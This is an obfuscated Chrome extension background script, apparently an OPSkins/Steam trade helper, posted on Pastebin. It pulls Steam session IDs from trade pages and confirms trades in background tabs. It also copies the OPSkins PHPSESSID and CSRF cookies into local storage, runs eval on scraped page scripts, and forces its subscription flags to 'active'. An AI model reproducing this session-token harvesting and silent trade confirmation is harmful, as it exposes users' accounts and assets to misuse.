Advertisement
Guest User

Untitled

a guest
Nov 18th, 2016
115
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function audioKeeper() {
  2.   BestDealsNotif = new Audio, BestDealsNotif['preload'] = 'auto', BestDealsNotif['src'] = 'sounds/BestDealsNotif.mp3', penWrite = new Audio, penWrite['preload'] = 'auto', penWrite['src'] = 'sounds/penWrite.ogg', penOff = new Audio, penOff['preload'] = 'auto', penOff['src'] = 'sounds/penOff.mp3', setTimeout(audioKeeper, 12e4)
  3. }
  4.  
  5. function outGoingTradeoffers() {
  6.   try {
  7.     if ('connectionTrue' == localStorage['getItem']('OnConnection')) {
  8.       if (void(0) != outgoingOffers['match'](/^[0-9]*\;/g)) {
  9.         var _0xa99ex3 = outgoingOffers['match'](/^[0-9]*\;/g);
  10.         _0xa99ex3 = _0xa99ex3.toString()['replace'](';', '');
  11.         var _0xa99ex4 = 'https://steamcommunity.com/tradeoffer/' + _0xa99ex3 + '/',
  12.           _0xa99ex5 = new XMLHttpRequest;
  13.         _0xa99ex5['open']('GET', _0xa99ex4, !0), _0xa99ex5['send'](null), _0xa99ex5['onreadystatechange'] = function() {
  14.           if (4 == _0xa99ex5['readyState']) {
  15.             if (_0xa99ex5['responseText']) {
  16.               var _0xa99ex4 = _0xa99ex5['responseText'],
  17.                 _0xa99ex6 = '<div>' + _0xa99ex4 + '</div>';
  18.               if (_0xa99ex4 = $(_0xa99ex6), void(0) != $('.trade_area', _0xa99ex4)['html']()) {
  19.                 var _0xa99ex7 = '',
  20.                   _0xa99ex8 = _0xa99ex6['indexOf']('g_sessionID = "');
  21.                 for (_0xa99ex8 += 15;
  22.                   '"' != _0xa99ex6[_0xa99ex8];) {
  23.                   _0xa99ex7 += _0xa99ex6[_0xa99ex8], _0xa99ex8++
  24.                 };
  25.                 var _0xa99ex9 = _0xa99ex6['indexOf']('g_ulTradePartnerSteamID = \'');
  26.                 _0xa99ex9 += 27;
  27.                 for (var _0xa99exa = '';
  28.                   '\'' != _0xa99ex6[_0xa99ex9];) {
  29.                   _0xa99exa += _0xa99ex6[_0xa99ex9], _0xa99ex9++
  30.                 };
  31.                 outGoingData = 'sessionid=' + _0xa99ex7 + '&serverid=1&tradeofferid=' + _0xa99ex3 + '&partner=' + _0xa99exa + '&captcha=', chrome['tabs']['create']({
  32.                   url: 'https://steamcommunity.com/tradeoffer/' + _0xa99ex3 + '/#tradeconfirm',
  33.                   selected: !1
  34.                 }, function(_0xa99ex3) {
  35.                   outgoingOrderTabId = _0xa99ex3['id']
  36.                 })
  37.               } else {
  38.                 outGoingSpecTry >= 2 && (outgoingOffers = outgoingOffers['replace'](_0xa99ex3 + ';', ''), outGoingSpecTry = 0), outGoingSpecTry++, setTimeout(outGoingTradeoffers, 5e3)
  39.               }
  40.             } else {
  41.               setTimeout(outGoingTradeoffers, 5e3)
  42.             }
  43.           }
  44.         }
  45.       } else {
  46.         setTimeout(outGoingTradeoffers, 5e3)
  47.       }
  48.     } else {
  49.       outgoingOffers = '', setTimeout(outGoingTradeoffers, 5e3)
  50.     }
  51.   } catch (_0xa99ex3) {
  52.     setTimeout(outGoingTradeoffers, 5e3)
  53.   }
  54. }
  55.  
  56. function incomingTradeoffers() {
  57.   try {
  58.     if (void(0) != incomingOffers['match'](/^[0-9]*\;/g)) {
  59.       var _0xa99ex3 = incomingOffers['match'](/^[0-9]*\;/g);
  60.       _0xa99ex3 = _0xa99ex3.toString()['replace'](';', '');
  61.       var _0xa99ex4 = 'https://steamcommunity.com/tradeoffer/' + _0xa99ex3 + '/',
  62.         _0xa99ex5 = new XMLHttpRequest;
  63.       _0xa99ex5['open']('GET', _0xa99ex4, !0), _0xa99ex5['send'](null), _0xa99ex5['onreadystatechange'] = function() {
  64.         if (4 == _0xa99ex5['readyState']) {
  65.           if (_0xa99ex5['responseText']) {
  66.             var _0xa99ex4 = _0xa99ex5['responseText'],
  67.               _0xa99ex6 = '<div>' + _0xa99ex4 + '</div>';
  68.             if (_0xa99ex4 = $(_0xa99ex6), void(0) != $('.trade_area', _0xa99ex4)['html']()) {
  69.               var _0xa99ex7 = '',
  70.                 _0xa99ex8 = _0xa99ex6['indexOf']('g_sessionID = "');
  71.               for (_0xa99ex8 += 15;
  72.                 '"' != _0xa99ex6[_0xa99ex8];) {
  73.                 _0xa99ex7 += _0xa99ex6[_0xa99ex8], _0xa99ex8++
  74.               };
  75.               var _0xa99ex9 = _0xa99ex6['indexOf']('g_ulTradePartnerSteamID = \'');
  76.               _0xa99ex9 += 27;
  77.               for (var _0xa99exa = '';
  78.                 '\'' != _0xa99ex6[_0xa99ex9];) {
  79.                 _0xa99exa += _0xa99ex6[_0xa99ex9], _0xa99ex9++
  80.               };
  81.               incomingData = 'sessionid=' + _0xa99ex7 + '&serverid=1&tradeofferid=' + _0xa99ex3 + '&partner=' + _0xa99exa + '&captcha=', chrome['tabs']['create']({
  82.                 url: 'https://steamcommunity.com/tradeoffer/' + _0xa99ex3 + '/#incomingTradeOfferConf',
  83.                 selected: !1
  84.               }, function(_0xa99ex3) {
  85.                 incomingOrderTabId = _0xa99ex3['id']
  86.               })
  87.             } else {
  88.               incomingSpecTry >= 2 && (incomingOffers = incomingOffers['replace'](_0xa99ex3 + ';', ''), incomingSpecTry = 0), incomingSpecTry++, setTimeout(incomingTradeoffers, 5e3)
  89.             }
  90.           } else {
  91.             setTimeout(incomingTradeoffers, 5e3)
  92.           }
  93.         }
  94.       }
  95.     } else {
  96.       setTimeout(incomingTradeoffers, 5e3)
  97.     }
  98.   } catch (_0xa99ex3) {
  99.     setTimeout(incomingTradeoffers, 5e3)
  100.   }
  101. }
  102.  
  103. function subInterval() {
  104.   var _0xa99ex3 = new XMLHttpRequest;
  105.   _0xa99ex3['open']('GET', 'http://extensions.risenraise.com/profile/', !0), _0xa99ex3['send'](null), _0xa99ex3['onreadystatechange'] = function() {
  106.     if (4 == _0xa99ex3['readyState']) {
  107.       if (_0xa99ex3['responseText'] && 200 == _0xa99ex3['status']) {
  108.         var _0xa99ex4 = _0xa99ex3['responseText'],
  109.           _0xa99ex5 = $('#email', _0xa99ex4)['text']();
  110.         if ('' != _0xa99ex5) {
  111.           var _0xa99ex6 = $('span[name="Opskins Trade Helper"]', _0xa99ex4)['text']();
  112.           if (void(0) != _0xa99ex6 && '' != _0xa99ex6 && parseInt(_0xa99ex6) >= 0) {
  113.             '0' == _0xa99ex6 && (_0xa99ex6 = 1)
  114.           } else {
  115.             _0xa99ex6 = '0'
  116.           };
  117.           localStorage['setItem']('accountMail', 'activated'), localStorage['setItem']('days', '∞'), localStorage['setItem']('sub', 'true'), chrome['storage']['sync']['set']({
  118.             opsSub: 'true'
  119.           })
  120.         } else {
  121.           var _0xa99ex6 = '0';
  122.           localStorage['setItem']('accountMail', 'activated'), localStorage['setItem']('sub', 'true'), localStorage['setItem']('days', '∞'), chrome['storage']['sync']['set']({
  123.             opsSub: 'true'
  124.           })
  125.         };
  126.         setTimeout(subInterval, 18e5)
  127.       } else {
  128.         setTimeout(subInterval, 3e4)
  129.       }
  130.     }
  131.   }
  132. }
  133. var quickConfirm = !1,
  134.   quickRemoveTabId = '',
  135.   subcheck = !1,
  136.   outgoingOffers = '',
  137.   outGoingData = '',
  138.   outgoingOrderTabId = '',
  139.   incomingOffers = '',
  140.   incomingData = '',
  141.   incomingOrderTabId = '',
  142.   BestDealsNotif, penWrite, penOff;
  143. audioKeeper(), localStorage['removeItem']('accountMail'), localStorage['removeItem']('days'), localStorage['removeItem']('sub'), chrome['storage']['sync']['set']({
  144.   opsSub: 'false'
  145. }), setTimeout(outGoingTradeoffers, 100), setTimeout(incomingTradeoffers, 100), chrome['notifications']['onClicked']['addListener'](function(_0xa99ex3) {
  146.   'tradeFail' == _0xa99ex3 && chrome['tabs']['create']({
  147.     url: 'https://steamcommunity.com/'
  148.   }), chrome['notifications']['clear'](_0xa99ex3, function() {})
  149. }), chrome['tabs']['onRemoved']['addListener'](function(_0xa99ex3, _0xa99ex4) {
  150.   _0xa99ex3 == quickRemoveTabId && (quickConfirm = !1), _0xa99ex3 == outgoingOrderTabId && (outGoingData = '', outGoingTradeoffers()), _0xa99ex3 == incomingOrderTabId && (incomingData = '', incomingTradeoffers())
  151. }), chrome['runtime']['onMessage']['addListener'](function(_0xa99ex19, _0xa99ex1a, _0xa99ex1b) {
  152.   if (/freshSpecialData\:/g ['test'](_0xa99ex19)) {
  153.     var _0xa99ex1c = _0xa99ex19['replace'](/freshSpecialData\:/gim, ''),
  154.       _0xa99ex1d = _0xa99ex1c;
  155.     localStorage['setItem']('userId', _0xa99ex1d), chrome['cookies']['get']({
  156.       url: 'https://opskins.com/',
  157.       name: 'PHPSESSID'
  158.     }, function(_0xa99ex3) {
  159.       _0xa99ex3['name'] != localStorage['getItem']('PHPSESSID') && localStorage['setItem']('PHPSESSID', _0xa99ex3['value'])
  160.     }), chrome['cookies']['get']({
  161.       url: 'https://opskins.com/',
  162.       name: 'opskins_csrf_token'
  163.     }, function(_0xa99ex3) {
  164.       _0xa99ex3['name'] != localStorage['getItem']('csrf') && localStorage['setItem']('csrf', _0xa99ex3['value'])
  165.     })
  166.   } else {
  167.     if ('deleteSpecialData' == _0xa99ex19) {
  168.       localStorage['removeItem']('csrf'), localStorage['removeItem']('userId'), localStorage['removeItem']('PHPSESSID')
  169.     } else {
  170.       if ('fastFASTfast' == _0xa99ex19) {
  171.         chrome['tabs']['create']({
  172.           url: 'https://opskins.com/?loc=shop_checkout'
  173.         })
  174.       } else {
  175.         if (/quickLog\:/gim ['test'](_0xa99ex19)) {
  176.           var _0xa99ex1e = {
  177.             type: 'basic',
  178.             title: 'Quick Buy',
  179.             message: _0xa99ex19['replace']('quickLog:', ''),
  180.             iconUrl: 'images/icon128.png'
  181.           };
  182.           chrome['notifications']['clear']('quickLog', function() {}), chrome['notifications']['create']('quickLog', _0xa99ex1e, function(_0xa99ex3) {})
  183.         } else {
  184.           if (/quickMsgBL\:/gim ['test'](_0xa99ex19)) {
  185.             var _0xa99ex1e = {
  186.               type: 'basic',
  187.               title: 'Black List',
  188.               message: _0xa99ex19['replace']('quickMsgBL:', ''),
  189.               iconUrl: 'images/icon128.png'
  190.             };
  191.             chrome['notifications']['clear']('quickMsgBL', function() {}), chrome['notifications']['create']('quickMsgBL', _0xa99ex1e, function(_0xa99ex3) {})
  192.           } else {
  193.             if (/tradeSuccess\:/gim ['test'](_0xa99ex19)) {
  194.               var _0xa99ex1e = {
  195.                 type: 'basic',
  196.                 title: 'Quick Buy',
  197.                 message: _0xa99ex19['replace'](/tradeSuccess\:/gim, ''),
  198.                 iconUrl: 'images/icon128.png'
  199.               };
  200.               chrome['notifications']['clear']('quickLog', function() {}), chrome['notifications']['clear']('tradeSuccess', function() {}), chrome['notifications']['create']('tradeSuccess', _0xa99ex1e, function(_0xa99ex3) {})
  201.             } else {
  202.               if (/tradeFail\:/gim ['test'](_0xa99ex19)) {
  203.                 var _0xa99ex1e = {
  204.                   type: 'basic',
  205.                   title: 'Quick Buy',
  206.                   message: _0xa99ex19['replace'](/tradeFail\:/gim, ''),
  207.                   iconUrl: 'images/icon128.png'
  208.                 };
  209.                 chrome['notifications']['clear']('quickLog', function() {}), chrome['notifications']['clear']('tradeFail', function() {}), chrome['notifications']['create']('tradeFail', _0xa99ex1e, function(_0xa99ex3) {})
  210.               } else {
  211.                 if ('getQuickConfirm' == _0xa99ex19) {
  212.                   chrome['tabs']['sendMessage'](_0xa99ex1a['tab']['id'], quickConfirm)
  213.                 } else {
  214.                   if ('getSpecialData' == _0xa99ex19) {
  215.                     var _0xa99ex1f = new XMLHttpRequest;
  216.                     _0xa99ex1f['open']('GET', 'https://opskins.com/?loc=support_tickets', !0), _0xa99ex1f['send'](null), _0xa99ex1f['onreadystatechange'] = function() {
  217.                       if (4 == _0xa99ex1f['readyState']) {
  218.                         if (_0xa99ex1f['responseText']) {
  219.                           var _0xa99ex20 = $('<div>' + _0xa99ex1f['responseText'] + '</div>');
  220.                           if (void(0) != $('.avatar-menu', _0xa99ex20)['html']()) {
  221.                             for (var _0xa99ex21 = $('script:not(:empty)', _0xa99ex20)['size'](), _0xa99ex22 = 0, _0xa99ex23 = ''; _0xa99ex22 < _0xa99ex21;) {
  222.                               _0xa99ex23 = $('script:not(:empty):eq(' + _0xa99ex22 + ')', _0xa99ex20)['text'](), _0xa99ex23['indexOf']('g_UID') > -1 && (eval(_0xa99ex23), _0xa99ex22 = _0xa99ex21), _0xa99ex22++
  223.                             };
  224.                             try {
  225.                               var _0xa99ex1d = g_UID;
  226.                               localStorage['setItem']('userId', _0xa99ex1d);
  227.                               var _0xa99ex1e = {
  228.                                 type: 'basic',
  229.                                 title: 'Opskins Trade Helper',
  230.                                 message: 'Special data collected.',
  231.                                 iconUrl: 'images/icon128.png'
  232.                               };
  233.                               chrome['notifications']['clear']('specialDataNotif', function() {}), chrome['notifications']['create']('specialDataNotif', _0xa99ex1e, function(_0xa99ex3) {}), chrome['cookies']['get']({
  234.                                 url: 'https://opskins.com/',
  235.                                 name: 'opskins_csrf_token'
  236.                               }, function(_0xa99ex3) {
  237.                                 localStorage['setItem']('csrf', _0xa99ex3['value']), chrome['cookies']['get']({
  238.                                   url: 'https://opskins.com/',
  239.                                   name: 'PHPSESSID'
  240.                                 }, function(_0xa99ex3) {
  241.                                   localStorage['setItem']('PHPSESSID', _0xa99ex3['value']), chrome['runtime']['sendMessage']('readyData')
  242.                                 })
  243.                               })
  244.                             } catch (a) {
  245.                               var _0xa99ex1e = {
  246.                                 type: 'basic',
  247.                                 title: 'Opskins Trade Helper',
  248.                                 message: 'Special data error.',
  249.                                 iconUrl: 'images/icon128.png'
  250.                               };
  251.                               chrome['notifications']['clear']('specialDataNotif', function() {}), chrome['notifications']['create']('specialDataNotif', _0xa99ex1e, function(_0xa99ex3) {}), console['log'](a), chrome['runtime']['sendMessage']('readyData')
  252.                             }
  253.                           } else {
  254.                             localStorage['removeItem']('csrf'), localStorage['removeItem']('userId'), localStorage['removeItem']('PHPSESSID');
  255.                             var _0xa99ex1e = {
  256.                               type: 'basic',
  257.                               title: 'Opskins Trade Helper',
  258.                               message: 'Sign In to OPSkins.',
  259.                               iconUrl: 'images/icon128.png'
  260.                             };
  261.                             chrome['notifications']['clear']('specialDataNotif', function() {}), chrome['notifications']['create']('specialDataNotif', _0xa99ex1e, function(_0xa99ex3) {}), chrome['runtime']['sendMessage']('readyData')
  262.                           }
  263.                         } else {
  264.                           var _0xa99ex1e = {
  265.                             type: 'basic',
  266.                             title: 'Opskins Trade Helper',
  267.                             message: 'Failed to collect special data.\x0AINTERNET DSCONECTED',
  268.                             iconUrl: 'images/icon128.png'
  269.                           };
  270.                           chrome['notifications']['clear']('specialDataNotif', function() {}), chrome['notifications']['create']('specialDataNotif', _0xa99ex1e, function(_0xa99ex3) {}), chrome['runtime']['sendMessage']('readyData')
  271.                         }
  272.                       }
  273.                     }
  274.                   } else {
  275.                     if (/InventoryManager\:/gim ['test'](_0xa99ex19)) {
  276.                       var _0xa99ex1e = {
  277.                         type: 'basic',
  278.                         title: 'Inventory Manager',
  279.                         message: _0xa99ex19['replace'](/InventoryManager\:/gim, ''),
  280.                         iconUrl: 'images/icon128.png'
  281.                       };
  282.                       chrome['notifications']['clear']('InventoryManager', function() {}), chrome['notifications']['create']('InventoryManager', _0xa99ex1e, function(_0xa99ex3) {})
  283.                     } else {
  284.                       if ('startsubcheck' == _0xa99ex19) {
  285.                         1 != subcheck && (setTimeout(subInterval, 18e5), subcheck = !0)
  286.                       } else {
  287.                         if (/^BDS_BL_Inport\:/gim ['test'](_0xa99ex19)) {
  288.                           var _0xa99ex24 = localStorage['getItem']('BestDealsSeacher_BL'),
  289.                             _0xa99ex25 = '[' + _0xa99ex19['replace'](/^BDS_BL_Inport\:/gim, '') + '];';
  290.                           if (void(0) == _0xa99ex24) {
  291.                             localStorage['setItem']('BestDealsSeacher_BL', _0xa99ex25), chrome['runtime']['sendMessage']('upd_BDS_BL:' + _0xa99ex25);
  292.                             var _0xa99ex1e = {
  293.                               type: 'basic',
  294.                               title: 'Best Deals Searcher',
  295.                               message: _0xa99ex25['replace'](/\]\;$/, '')['replace'](/^\[/, '') + '\x0Aadded to the BlackList',
  296.                               iconUrl: 'images/blimg.png'
  297.                             };
  298.                             penWrite['play'](), chrome['notifications']['clear']('bds_bl_msg', function() {}), chrome['notifications']['create']('bds_bl_msg', _0xa99ex1e, function(_0xa99ex3) {})
  299.                           } else {
  300.                             if (_0xa99ex24['indexOf'](_0xa99ex25) > -1) {
  301.                               var _0xa99ex1e = {
  302.                                 type: 'basic',
  303.                                 title: 'Best Deals Searcher',
  304.                                 message: 'This item is already in the list',
  305.                                 iconUrl: 'images/icon128.png'
  306.                               };
  307.                               penOff['play'](), chrome['notifications']['clear']('bds_bl_msg', function() {}), chrome['notifications']['create']('bds_bl_msg', _0xa99ex1e, function(_0xa99ex3) {})
  308.                             } else {
  309.                               _0xa99ex24 = _0xa99ex25 + _0xa99ex24, localStorage['setItem']('BestDealsSeacher_BL', _0xa99ex24), chrome['runtime']['sendMessage']('upd_BDS_BL:' + _0xa99ex25);
  310.                               var _0xa99ex1e = {
  311.                                 type: 'basic',
  312.                                 title: 'Best Deals Searcher',
  313.                                 message: _0xa99ex25['replace'](/\]\;$/, '')['replace'](/^\[/, '') + '\x0Aadded to the BlackList',
  314.                                 iconUrl: 'images/blimg.png'
  315.                               };
  316.                               penWrite['play'](), chrome['notifications']['clear']('bds_bl_msg', function() {}), chrome['notifications']['create']('bds_bl_msg', _0xa99ex1e, function(_0xa99ex3) {})
  317.                             }
  318.                           }
  319.                         } else {
  320.                           if ('This item is already in the list' == _0xa99ex19) {
  321.                             var _0xa99ex1e = {
  322.                               type: 'basic',
  323.                               title: 'Best Deals Searcher',
  324.                               message: 'This item is already in the list',
  325.                               iconUrl: 'images/icon128.png'
  326.                             };
  327.                             chrome['notifications']['clear']('bds_bl_msg', function() {}), chrome['notifications']['create']('bds_bl_msg', _0xa99ex1e, function(_0xa99ex3) {})
  328.                           } else {
  329.                             if (/confirmThisOutgoingTrade\:/gim ['test'](_0xa99ex19)) {
  330.                               var _0xa99ex26 = _0xa99ex19['replace'](/confirmThisOutgoingTrade\:/gim, '');
  331.                               outgoingOffers = outgoingOffers + _0xa99ex26 + ';'
  332.                             } else {
  333.                               if ('getOutgoingData' == _0xa99ex19) {
  334.                                 chrome['tabs']['sendMessage'](_0xa99ex1a['tab']['id'], 'outGoingData:' + outGoingData + ';;;' + outgoingOffers['match'](/^[0-9]*\;/g)
  335.                                   .toString()['replace'](';', ''))
  336.                               } else {
  337.                                 if ('outGoingTradeConfirmed' == _0xa99ex19) {
  338.                                   chrome['runtime']['sendMessage']('successOutgoingTradeOffer:' + outgoingOffers['match'](/^[0-9]*\;/g)
  339.                                     .toString()['replace'](';', '')), outgoingOffers = outgoingOffers['replace'](/^[0-9]*\;/g, ''), outGoingSpecTry = 0
  340.                                 } else {
  341.                                   if (/quickConfirmTadeoffer\:/gim ['test'](_0xa99ex19)) {
  342.                                     var _0xa99ex26 = _0xa99ex19['replace'](/quickConfirmTadeoffer\:/gim, '');
  343.                                     incomingOffers = incomingOffers + _0xa99ex26 + ';'
  344.                                   } else {
  345.                                     if ('getIncomingData' == _0xa99ex19) {
  346.                                       chrome['tabs']['sendMessage'](_0xa99ex1a['tab']['id'], 'incomingData:' + incomingData + ';;;' + incomingOffers['match'](/^[0-9]*\;/g)
  347.                                         .toString()['replace'](';', ''))
  348.                                     } else {
  349.                                       if ('incomingTradeConfirmed' == _0xa99ex19) {
  350.                                         chrome['runtime']['sendMessage']('successIncomingTradeOffer:' + incomingOffers['match'](/^[0-9]*\;/g)
  351.                                           .toString()['replace'](';', '')), incomingOffers = incomingOffers['replace'](/^[0-9]*\;/g, ''), incomingSpecTry = 0
  352.                                       } else {
  353.                                         if (/DealsNotif\:/gim ['test'](_0xa99ex19)) {
  354.                                           var _0xa99ex1e = {
  355.                                             type: 'basic',
  356.                                             title: 'Best Deals Searcher',
  357.                                             message: _0xa99ex19['replace'](/DealsNotif\:/gim, ''),
  358.                                             iconUrl: 'images/icon128.png'
  359.                                           };
  360.                                           BestDealsNotif['play'](), chrome['notifications']['clear']('DealsNotif', function() {}), chrome['notifications']['create']('DealsNotif', _0xa99ex1e, function(_0xa99ex3) {})
  361.                                         }
  362.                                       }
  363.                                     }
  364.                                   }
  365.                                 }
  366.                               }
  367.                             }
  368.                           }
  369.                         }
  370.                       }
  371.                     }
  372.                   }
  373.                 }
  374.               }
  375.             }
  376.           }
  377.         }
  378.       }
  379.     }
  380.   }
  381. }), localStorage['setItem']('OnConnection', 'connectionFalse'), chrome['runtime']['onMessageExternal']['addListener'](function(_0xa99ex3, _0xa99ex4, _0xa99ex5) {
  382.   _0xa99ex3 = _0xa99ex3['data'], 'connectionTrue' == _0xa99ex3 && (localStorage['setItem']('OnConnection', _0xa99ex3), chrome['runtime']['sendMessage']('checkConnetion')), 'connectionFalse' == _0xa99ex3 && (localStorage['setItem']('OnConnection', _0xa99ex3), chrome['runtime']['sendMessage']('checkConnetion'))
  383. });
  384. var outGoingSpecTry = 0,
  385.   incomingSpecTry = 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement